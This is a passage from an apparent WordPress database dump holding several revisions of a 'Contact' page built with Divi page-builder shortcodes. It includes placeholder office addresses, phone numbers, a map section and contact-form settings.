_builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Los Angeles</h4>\r\n<p>22 East 41/B Street, New York,<br /> Los Angeles, CA 92301, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoLA@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>San Francisco</h4>\r\n<p>22 East 41/B Street, <br />San Francisco, CA 30401, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>New York</h4>\r\n<p>22 East 41/B Street, <br />New York, NY 98765, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"Oakland, CA, USA\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"3.18.2\" child_filter_saturate=\"30%\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#353740\" button_border_width=\"5px\" button_border_color=\"#353740\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#353740\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Budget\" field_title=\"Approximate Budget\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-07 20:52:05','2020-08-07 20:52:05','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/401-revision-v1/',0,'revision','',0),(641,1,'2020-08-07 20:53:06','2020-08-07 20:53:06','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Los Angeles</h4>\r\n<p>22 East 41/B Street, New York,<br /> Los Angeles, CA 92301, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoLA@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>San Francisco</h4>\r\n<p>22 East 41/B Street, <br />San Francisco, CA 30401, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>New York</h4>\r\n<p>22 East 41/B Street, <br />New York, NY 98765, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"Oakland, CA, USA\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"3.18.2\" child_filter_saturate=\"30%\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-07 20:53:06','2020-08-07 20:53:06','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/401-revision-v1/',0,'revision','',0),(643,1,'2020-08-07 20:55:10','2020-08-07 20:55:10','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>&nbsp;</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoLA@designagency.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>San Francisco</h4>\r\n<p>22 East 41/B Street, <br />San Francisco, CA 30401, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>New York</h4>\r\n<p>22 East 41/B Street, <br />New York, NY 98765, USA</p>\r\n<p>+22 1234 5678 5411</p>\r\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"Oakland, CA, USA\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"3.18.2\" child_filter_saturate=\"30%\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" 